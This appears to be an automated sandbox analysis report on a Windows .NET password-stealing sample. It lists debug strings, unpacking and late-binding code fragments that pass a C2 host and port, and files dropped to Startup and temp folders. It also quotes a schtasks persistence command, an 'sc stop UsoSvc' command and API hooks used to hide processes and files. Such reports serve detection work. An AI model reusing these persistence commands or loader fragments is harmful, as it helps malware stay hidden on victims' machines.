                  Source: Binary string: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.PDBH source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1665472479.00000042D62F3000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Runtime.ni.pdbH source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.AddIn.Contract.pdbP source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.ServiceModel.Activities.pdbP source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: Microsoft.VisualBasic.pdbMZ@ source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Transactions.ni.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Web.Entity.Design.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: C:\Windows\Containers\Confidential\DotnetGenerator\Stub\Projects\HFayo\obj\Release\HFayo.pdb source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, ohvrxt.exe.3.dr
                  Source: Binary string: System.Transactions.ni.pdbRSDS source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.ni.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr, WER2A76.tmp.dmp.6.dr
                  Source: Binary string: Microsoft.VisualBasic.Compatibility.Data.pdbH source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.Core.ni.pdbRSDS source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr, WER2A76.tmp.dmp.6.dr
                  Source: Binary string: System.ServiceModel.Activities.pdbH source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Configuration.Install.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: Microsoft.Transactions.Bridge.Dtc.pdb.CRT$XIZ source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1670799032.0000016EB4D62000.00000004.00000020.00020000.00000000.sdmp, spczxf.exe, 00000008.00000002.1740777553.000001A4CD9E1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.ServiceModel.Web.pdbP source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.IO.Compression.pdb0<c source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.ServiceModel.Channels.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: Microsoft.VisualC.STLCLR.pdbH source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Activities.DurableInstancing.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1665839826.0000016E99246000.00000004.00000020.00020000.00000000.sdmp, spczxf.exe, 00000008.00000002.1740777553.000001A4CD9E1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Design.pdbSystem.AddIn.dllSystem.Dynamic.dllSystem.AddIn.dll source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Runtime.Remoting.pdbp^a source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.DirectoryServices.ni.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.ServiceModel.Internals.pdb8 source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Data.Services.Design.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Dynamic.pdbH source: WER696F.tmp.dmp.30.dr, WER2A76.tmp.dmp.6.dr
                  Source: Binary string: Microsoft.Data.Entity.Build.Tasks.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Runtime.DurableInstancing.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: ISymWrapper.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Web.Entity.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Runtime.WindowsRuntime.UI.Xaml.pdb\?\p source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Web.Entity.pdbP source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.IdentityModel.Selectors.pdbSystem.Runtime.Handles.dll source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: Microsoft.VisualC.STLCLR.pdb source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: CustomMarshalers.ni.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Web.DynamicData.Design.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.EnterpriseServices.pdbpFM source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.Net.Http.pdbSystem.Linq.Queryable.dll source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.Web.Routing.pdb source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Data.Services.pdbMZ source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Web.Extensions.pdbP source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Data.Services.Client.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: Microsoft.Transactions.Bridge.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: Microsoft.Build.Conversion.v4.0.pdbH source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr, WER2A76.tmp.dmp.6.dr
                  Source: Binary string: System.DirectoryServices.AccountManagement.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Data.DataSetExtensions.pdb` source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Workflow.Runtime.pdbMZ source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Data.DataSetExtensions.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: XamlBuildTask.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Windows.Forms.pdbSystem.Resources.ResourceManager.dllSystem.ComponentModel.Annotations.dllSystem.Resources.ResourceManager.dllL source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Web.DynamicData.pdbH source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.Runtime.WindowsRuntime.ni.pdbRSDS source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Web.DataVisualization.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb1{qm^ source: spczxf.exe, 00000008.00000002.1740777553.000001A4CD9D1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: Microsoft.VisualBasic.pdb,> source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Windows.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.ComponentModel.Composition.pdbp source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.ServiceModel.Internals.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Runtime.ni.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.ComponentModel.DataAnnotations.pdbSystem.Web.Extensions.dll source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: Microsoft.Build.Engine.pdbH source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.DirectoryServices.AccountManagement.pdbH source: WER95BE.tmp.dmp.46.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Web.Routing.pdbP source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.Data.DataSetExtensions.pdbSystem.Runtime.Serialization.Formatters.dllSystem.Runtime.CompilerServices.VisualC.dllSystem.Runtime.CompilerServices.VisualC.dll source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: CustomMarshalers.pdb.CRT$XPA source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: spczxf.exe, 00000008.00000002.1740777553.000001A4CD9E1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.DirectoryServices.ni.pdbRSDS source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Drawing.ni.pdbRSDS source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr, WER2A76.tmp.dmp.6.dr
                  Source: Binary string: System.Runtime.Remoting.ni.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: C:\Windows\HFayo.pdbpdbayo.pdb source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1670799032.0000016EB4D62000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Net.Http.pdbu source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: Microsoft.VisualC.STLCLR.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1670799032.0000016EB4D62000.00000004.00000020.00020000.00000000.sdmp, spczxf.exe, 00000008.00000002.1740777553.000001A4CD870000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Device.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr, WER2A76.tmp.dmp.6.dr
                  Source: Binary string: System.Activities.DurableInstancing.pdbMZ source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Numerics.Vectors.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Runtime.WindowsRuntime.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Data.OracleClient.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Xml.Serialization.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Runtime.Remoting.pdbSystem.Runtime.Remoting.dllMicrosoft.VisualBasic.ni.dllMicrosoft.Build.Tasks.v4.0.dllSystem.Runtime.Remoting.ni.dllC:\ source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.ServiceModel.Activities.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.IO.Log.pdbMZ source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Reflection.Context.pdb`QR source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.ComponentModel.Composition.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: Microsoft.VisualBasic.Compatibility.pdbSystem.Security.Cryptography.Algorithms.dll source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: Microsoft.Build.Conversion.v4.0.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Drawing.pdbP source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.ni.pdbRSDS source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr, WER2A76.tmp.dmp.6.dr
                  Source: Binary string: \??\C:\Windows\HFayo.pdbB source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1670799032.0000016EB4D62000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: Microsoft.Build.Utilities.v4.0.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: Microsoft.Transactions.Bridge.pdb??\ source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Activities.pdbP source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: Microsoft.Build.Engine.pdb source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.IO.Log.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Runtime.Remoting.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Data.ni.pdbRSDSC source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.pdbMZ source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Core.pdbH source: WER2A76.tmp.dmp.6.dr
                  Source: Binary string: CustomMarshalers.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Reflection.Context.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Net.Http.WebRequest.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.ServiceModel.ServiceMoniker40.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: \??\C:\Windows\exe\HFayo.pdb source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1670799032.0000016EB4D62000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Activities.Presentation.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: Microsoft.JScript.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Reflection.Context.pdb( source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Runtime.Serialization.Formatters.Soap.pdbP{ source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Runtime.WindowsRuntime.UI.Xaml.pdb@GN source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.Data.Services.pdbH source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: Microsoft.Activities.Build.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Web.Mobile.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr

                  Data Obfuscation

                  barindex
                  .NET source code contains method to dynamically call methods (often used by packers)
                  Source: 0.2.SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe.16e9aca9960.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: 0.2.SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe.16e9aca9960.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: 0.2.SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe.16e9aca9960.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                  .NET source code contains potential unpacker
                  Source: 0.2.SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe.16e9aca9960.0.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                  Source: 0.2.SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe.16e9aca9960.0.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                  Source: 0.2.SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe.16e9aca9960.0.raw.unpack, Messages.cs.Net Code: Memory
                  Source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeStatic PE information: 0xDF358803 [Tue Aug 31 21:49:55 2088 UTC]
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exeCode function: 16_2_00007FF7FE544AC0 memset,GetVersionExW,memset,GetSystemDirectoryW,lstrlenW,lstrlenW,LoadLibraryW,GetProcAddress,FreeLibrary,16_2_00007FF7FE544AC0
                  Source: Microsoft.exe.12.drStatic PE information: section name: .didat
                  Source: pkiwizgebqxq.exe.41.drStatic PE information: section name: .didat
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeCode function: 0_2_00007FFAAC257F28 push ds; retf 5F50h0_2_00007FFAAC27488F
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeCode function: 0_2_00007FFAAC257F28 pushfd ; retn 5F50h0_2_00007FFAAC275011
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeCode function: 0_2_00007FFAAC39082B push esp; retf 4810h0_2_00007FFAAC3908D2
                  Source: C:\Windows\System32\svchost.exeCode function: 2_2_00000142DB15C6DD push rcx; retf 003Fh2_2_00000142DB15C6DE
                  Source: C:\Windows\System32\svchost.exeCode function: 2_2_00000142DB41ACDD push rcx; retf 003Fh2_2_00000142DB41ACDE
                  Source: C:\Windows\System32\svchost.exeCode function: 4_2_000001F28A02ACDD push rcx; retf 003Fh4_2_000001F28A02ACDE
                  Source: C:\Windows\System32\svchost.exeCode function: 4_2_000001F28A05C6DD push rcx; retf 003Fh4_2_000001F28A05C6DE
                  Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000023D0749C6DD push rcx; retf 003Fh7_2_0000023D0749C6DE
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeCode function: 8_2_00007FFAAC24752B push ebx; iretd 8_2_00007FFAAC24756A
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeCode function: 8_2_00007FFAAC2400AD pushad ; iretd 8_2_00007FFAAC2400C1
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeCode function: 8_2_00007FFAAC247963 push ebx; retf 8_2_00007FFAAC24796A
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeCode function: 8_2_00007FFAACBA026B push esp; retf 4810h8_2_00007FFAACBA0312
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 12_2_000002109C3AACDD push rcx; retf 003Fh12_2_000002109C3AACDE
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 12_2_000002109C3DC6DD push rcx; retf 003Fh12_2_000002109C3DC6DE
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeCode function: 20_2_00007FFAAC250661 push edi; iretd 20_2_00007FFAAC250662
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeCode function: 20_2_00007FFAAC2500BD pushad ; iretd 20_2_00007FFAAC2500C1
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeCode function: 20_2_00007FFAAC263425 push ebp; iretd 20_2_00007FFAAC263428
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeCode function: 20_2_00007FFAAC39082B push esp; retf 4810h20_2_00007FFAAC3908D2
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeCode function: 20_2_00007FFAAC392348 pushad ; retf 20_2_00007FFAAC392349
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeCode function: 21_2_00007FFAAC2400BD pushad ; iretd 21_2_00007FFAAC2400C1
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeCode function: 21_2_00007FFAACBA0001 push esp; retf 4810h21_2_00007FFAACBA0312
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 23_2_00000200A98DACDD push rcx; retf 003Fh23_2_00000200A98DACDE
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 23_2_00000200AB64C6DD push rcx; retf 003Fh23_2_00000200AB64C6DE
                  Source: C:\Users\user\AppData\Local\Temp\utntwb.exeCode function: 35_2_00007FFAAC2400BD pushad ; iretd 35_2_00007FFAAC2400C1
                  Source: C:\Users\user\AppData\Local\Temp\utntwb.exeCode function: 35_2_00007FFAAC255669 push eax; ret 35_2_00007FFAAC2561DD
                  Source: C:\Users\user\AppData\Local\Temp\utntwb.exeCode function: 35_2_00007FFAAC24DC68 pushad ; retf 35_2_00007FFAAC24DC69
                  Source: C:\Users\user\AppData\Local\Temp\utntwb.exeCode function: 35_2_00007FFAACBA026B push esp; retf 4810h35_2_00007FFAACBA0312
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 41_2_0000000140001394 push qword ptr [000000014000E004h]; ret 41_2_0000000140001403
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 41_2_000001DDEEF8ACDD push rcx; retf 003Fh41_2_000001DDEEF8ACDE
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 41_2_000001DDEEFBC6DD push rcx; retf 003Fh41_2_000001DDEEFBC6DE
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 42_2_000001932CDEACDD push rcx; retf 003Fh42_2_000001932CDEACDE
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeFile created: C:\Users\user\AppData\Local\Temp\spczxf.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\ServiceHub\msbuild.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeFile created: C:\Users\user\AppData\Local\Temp\ohvrxt.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeFile created: C:\Users\user\AppData\Local\Temp\hgzxhw.exeJump to dropped file
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeFile created: C:\ProgramData\xlffyhztkvzk\pkiwizgebqxq.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeFile created: C:\Users\user\AppData\Local\Temp\utntwb.exeJump to dropped file
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeFile created: C:\ProgramData\xlffyhztkvzk\pkiwizgebqxq.exeJump to dropped file

                  Boot Survival

                  barindex
                  Drops PE files to the startup folder
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exeJump to dropped file
                  Uses schtasks.exe or at.exe to add and modify task schedules
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "msbuild" /sc MINUTE /tr "C:\Users\user\AppData\Local\ServiceHub\msbuild.exe" /rl HIGHEST /f
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\tc.txt
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exe
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Hooks files or directories query functions (used to hide files and directories)
                  Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
                  Hooks processes query functions (used to hide processes)
                  Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
                  Hooks registry keys query functions (used to hide registry keys)
                  Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
                  Modifies the prolog of user mode functions (user mode inline hooks)
                  Source: explorer.exeUser mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
